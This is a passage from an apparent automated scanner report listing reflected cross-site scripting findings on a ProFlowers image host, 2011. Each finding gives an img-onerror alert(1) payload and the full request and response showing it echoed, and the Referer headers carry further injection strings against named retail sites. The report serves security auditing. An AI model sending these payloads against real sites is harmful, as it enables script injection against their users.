The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1cbee<img%20src%3da%20onerror%3dalert(1)>5763a4a3885 was submitted in the REST URL parameter 9. This input was echoed as 1cbee<img src=a onerror=alert(1)>5763a4a3885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ1cbee<img%20src%3da%20onerror%3dalert(1)>5763a4a3885?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:36 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000001125X_023117_W1_SQ1cbee<img src=a onerror=alert(1)>5763a4a3885

4.104. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 74452<img%20src%3da%20onerror%3dalert(1)>3add74ea4c6 was submitted in the REST URL parameter 9. This input was echoed as 74452<img src=a onerror=alert(1)>3add74ea4c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ74452<img%20src%3da%20onerror%3dalert(1)>3add74ea4c6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000009D209_087948_W1_SQ74452<img src=a onerror=alert(1)>3add74ea4c6

4.105. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9fe05<img%20src%3da%20onerror%3dalert(1)>4969de73a20 was submitted in the REST URL parameter 9. This input was echoed as 9fe05<img src=a onerror=alert(1)>4969de73a20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W19fe05<img%20src%3da%20onerror%3dalert(1)>4969de73a20?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:28 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000009D183X_087921_W19fe05<img src=a onerror=alert(1)>4969de73a20

4.106. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4fef5<img%20src%3da%20onerror%3dalert(1)>efadcde1f33 was submitted in the REST URL parameter 9. This input was echoed as 4fef5<img src=a onerror=alert(1)>efadcde1f33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF4fef5<img%20src%3da%20onerror%3dalert(1)>efadcde1f33?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=300&hei=350 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:27 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF4fef5<img src=a onerror=alert(1)>efadcde1f33

4.107. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c2ba5<img%20src%3da%20onerror%3dalert(1)>fbc47c0020f was submitted in the REST URL parameter 9. This input was echoed as c2ba5<img src=a onerror=alert(1)>fbc47c0020f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PFc2ba5<img%20src%3da%20onerror%3dalert(1)>fbc47c0020f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:51 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000M519_VA0606_W1_PFc2ba5<img src=a onerror=alert(1)>fbc47c0020f

4.108. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ea72b<img%20src%3da%20onerror%3dalert(1)>f25cd72b5d0 was submitted in the REST URL parameter 9. This input was echoed as ea72b<img src=a onerror=alert(1)>f25cd72b5d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PFea72b<img%20src%3da%20onerror%3dalert(1)>f25cd72b5d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:48 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PFea72b<img src=a onerror=alert(1)>f25cd72b5d0

4.109. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload db8a2<img%20src%3da%20onerror%3dalert(1)>dc2c61a3c73 was submitted in the REST URL parameter 9. This input was echoed as db8a2<img src=a onerror=alert(1)>dc2c61a3c73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PFdb8a2<img%20src%3da%20onerror%3dalert(1)>dc2c61a3c73?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:52 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000R212_VA1137_W1_PFdb8a2<img src=a onerror=alert(1)>dc2c61a3c73

4.110. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5add8<img%20src%3da%20onerror%3dalert(1)>51d9c6eb19b was submitted in the REST URL parameter 9. This input was echoed as 5add8<img src=a onerror=alert(1)>51d9c6eb19b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF5add8<img%20src%3da%20onerror%3dalert(1)>51d9c6eb19b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4incampanula_dblbskt09_PF5add8<img src=a onerror=alert(1)>51d9c6eb19b

4.111. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a996e<img%20src%3da%20onerror%3dalert(1)>05540ad9da6 was submitted in the REST URL parameter 9. This input was echoed as a996e<img src=a onerror=alert(1)>05540ad9da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PFa996e<img%20src%3da%20onerror%3dalert(1)>05540ad9da6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4inmoneytree_lotus09_PFa996e<img src=a onerror=alert(1)>05540ad9da6

4.112. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f94e9<img%20src%3da%20onerror%3dalert(1)>2cc41beea4f was submitted in the REST URL parameter 9. This input was echoed as f94e9<img src=a onerror=alert(1)>2cc41beea4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PFf94e9<img%20src%3da%20onerror%3dalert(1)>2cc41beea4f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PFf94e9<img src=a onerror=alert(1)>2cc41beea4f

4.113. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 75728<img%20src%3da%20onerror%3dalert(1)>1d0b0a9d30d was submitted in the REST URL parameter 9. This input was echoed as 75728<img src=a onerror=alert(1)>1d0b0a9d30d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF75728<img%20src%3da%20onerror%3dalert(1)>1d0b0a9d30d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF75728<img src=a onerror=alert(1)>1d0b0a9d30d

4.114. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b7dea<img%20src%3da%20onerror%3dalert(1)>38121d80567 was submitted in the REST URL parameter 9. This input was echoed as b7dea<img src=a onerror=alert(1)>38121d80567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PFb7dea<img%20src%3da%20onerror%3dalert(1)>38121d80567?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:12 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6incallapnk_victin11_PC1601_PFb7dea<img src=a onerror=alert(1)>38121d80567

4.115. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 874d0<img%20src%3da%20onerror%3dalert(1)>5db3fd9eabd was submitted in the REST URL parameter 9. This input was echoed as 874d0<img src=a onerror=alert(1)>5db3fd9eabd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF874d0<img%20src%3da%20onerror%3dalert(1)>5db3fd9eabd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF874d0<img src=a onerror=alert(1)>5db3fd9eabd

4.116. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 494e2<img%20src%3da%20onerror%3dalert(1)>b57ae1753bf was submitted in the REST URL parameter 9. This input was echoed as 494e2<img src=a onerror=alert(1)>b57ae1753bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF494e2<img%20src%3da%20onerror%3dalert(1)>b57ae1753bf?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:55 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF494e2<img src=a onerror=alert(1)>b57ae1753bf

4.117. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c5572<img%20src%3da%20onerror%3dalert(1)>cbdab6a22f3 was submitted in the REST URL parameter 9. This input was echoed as c5572<img src=a onerror=alert(1)>cbdab6a22f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PFc5572<img%20src%3da%20onerror%3dalert(1)>cbdab6a22f3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6ingardtop_fpc08_PFc5572<img src=a onerror=alert(1)>cbdab6a22f3

4.118. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34857<img%20src%3da%20onerror%3dalert(1)>40952913b8 was submitted in the REST URL parameter 9. This input was echoed as 34857<img src=a onerror=alert(1)>40952913b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF34857<img%20src%3da%20onerror%3dalert(1)>40952913b8?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
